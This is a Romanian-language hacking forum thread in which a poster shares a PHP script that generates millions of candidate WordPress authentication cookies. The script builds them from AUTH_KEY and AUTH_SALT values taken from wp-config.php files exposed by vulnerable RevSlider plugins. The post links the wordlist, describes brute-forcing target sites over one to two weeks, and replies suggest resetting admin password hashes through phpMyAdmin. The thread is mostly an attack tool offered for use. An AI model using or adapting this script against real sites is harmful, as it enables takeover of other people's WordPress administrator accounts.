WP Cookie Brute

[bobbytables]

Oamenii sunt indignati de faptul ca au gasit zeci de mii de Wordpress-uri cu versiuni de RevSlider vulnerabile si ca n-au ce face cu informatiile din wp-config.php(pentru ca n-au acces phpmyadmin, ori pentru ca sysadminii sunt atat de nesimtiti incat nu dau drepturi de citire in tot sistemul).

Ca sa va indignez si mai mult, am scris un script PHP care calculeaza toate valorile posibile pentru cookie-ul de autentificare, pe baza AUTH_KEY-ului si AUTH_SALT-ului prezente in wp-config.

Scriptul va returna 16.785.472 rezultate. Dureaza cam 1-2 saptamani de brute(cu 15-30 req/s). Daca targetati ceva important, se merita.

In sursa trebuie sa modificati $user, $secret_key, $salt, $wp_url.

<?php
//4 hackers by bobbytables @ rstforums.com

$user = 'admin';
$secret_key = '4mSa>lH#T{,T)J!Q[F[F|1tvKRP=r3T|qTwgQN#JXDD%&4$=1x9<R1-Dj2u^:Y+r';
$salt = 'VDm[*6!ba}8=D}|eh7WRZxIItH+!4,1m^jD8qz)%d^y.#z6^~`&qY+b7nxa2&Str';
$wp_url = 'http://rstforums.com';
$chunks = file('4char.txt');
$timestamp = '1430784000';
echo "Cookie name: wordpress_" . md5($wp_url) . "\n";
echo "All possible cookie values: " . "\n";
foreach($chunks as $pass)
	echo $user . '|' . $timestamp . '|' . hash_hmac('md5', $user . '|' . $timestamp, hash_hmac('md5', $user . $pass . '|' . $timestamp, $secret_key . $salt)) . "\n";

?>

php wp_cookiebrute.php
Cookie name: wordpress_78145c8b444408b7c6139e28b09b7814
All possible cookie values: 
admin|1430784000|7c50ff16b95684127d7011468e202bc7
admin|1430784000|5edebfcb996c6032740554a2f3f24de5
etc.

Probabil o sa va crape sistemul, asa ca faceti si voi chunk-uri din fisierul 4char.txt din arhiva.

Download

https://www.wetransfer.com/downloads/cc76c17d29ee406b047c1e6ab6ff8c6520140907182229/b8c10007d9622e900479eb04647bc37d20140907182229/dd7d94

Have fun!

Edited September 17, 2014 by bobbytables

[Aripipevant]

Prea v? complica?i. Eu zic c? se poate face destule chiar dac? nu ?tim prea multe detalii despre ?int?. În primul rând verific?m dac? avem localhost-ul prefixat, ex 123.localhost - a?a e cel mai simplu, trebuie doar accesat ?i avem acces la phpmyadmin. Dac? nu e prefixat, c?ut?m IP-ul serverului ?i gata. În ultimu rând ca s? prind acces la interfa?a WordPress-ului a? face astfel: Merg la wp_users --> Edit --> ?i la user_pass selectez MD5, dupa aia îmi scriu nou? parola dorit? ?i done. WordPress-ul o s? aplice dup? aia SALT-ul dar parola o sa fie cea aleas?.

[bobbytables]

Se recurge la metoda pe care am descris-o atunci cand spectrul de acces se rezuma la wp-config si singurele informatii care pot contrui un vector de atac sunt AUTH_KEY si AUTH_SALT. Adica nu poti parasi DocumentRoot-ul virtualhost-ului si nici nu ai acces la o interfata de DB management. Trebuie tinut cont si de urmatoarele: la aproape 17 mil. request-uri HEAD generezi un trafic de 32GB(TX+RX) la 1kb/req si 1,2 GB de log-uri, plus eventuala prezenta a unui firewall care are request limiting si eventual un mod_evasive care te arunca automat in null route. Bineinteles, vorbim de 17 mil. request-uri in cel mai rau caz, dar daca server-ul pe care este gazduita tinta are bandwidth, nu este configurat corespunzator si nici observat de un administrator, atunci ai sanse de succes.

[bobbytables]

Haha, am fost mult mai rapid: Leveraging LFI To Get Full Compromise On WordPress Sites - SpiderLabs Anterior

[florinul]

salutare xplica-mi cum se foloseste

agro2:/tmp# php wp

PHP Warning: Module 'MapScript' already loaded in Unknown on line 0

Warning: file(4char.txt): failed to open stream: No such file or directory in /tmp/wp on line 10

Cookie name: wordpress_72e38bc39b0910555ad5cac5dcbf8381

All possible cookie values:

Warning: Invalid argument supplied for foreach() in /tmp/wp on line 14

am modificat auth salt url etc...

[Dragos]

Creeaza fisierul 4char.txt si da-i permisiuni de citire/scriere pe el.

[florinul]

L-am creat da tot nu se intampla nimic ...